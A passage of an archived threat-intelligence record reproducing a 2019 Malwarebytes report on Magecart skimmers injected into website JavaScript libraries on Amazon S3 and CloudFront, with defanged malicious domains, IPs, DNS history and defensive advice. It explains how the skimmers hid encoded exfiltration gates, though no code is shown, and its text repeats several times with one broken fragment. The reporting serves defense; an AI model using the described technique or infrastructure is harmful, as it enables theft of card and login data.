(IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 331 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 332 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 333 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 334 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 335 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 336 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 337 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 338 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 339 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 340 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 341 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 342 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 343 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 344 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 345 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 346 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 347 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 348 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 349 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 350 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nSource: https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 351 of 351", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/" ], "report_names": [ "magecart-skimmers-found-on-amazon-cloudfront-cdn" ], "threat_actors": [ { "id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed", "created_at": "2023-01-06T13:46:38.814104Z", "updated_at": "2026-04-10T02:00:03.110104Z", "deleted_at": null, "main_name": "MageCart", "aliases": [], "source_name": "MISPGALAXY:MageCart", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434493, "ts_updated_at": 1775791451, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a2b58817a1bb63945895f6b4d0a0afcc98e53b8b.pdf", "text": "https://archive.orkl.eu/a2b58817a1bb63945895f6b4d0a0afcc98e53b8b.txt", "img": "https://archive.orkl.eu/a2b58817a1bb63945895f6b4d0a0afcc98e53b8b.jpg" } }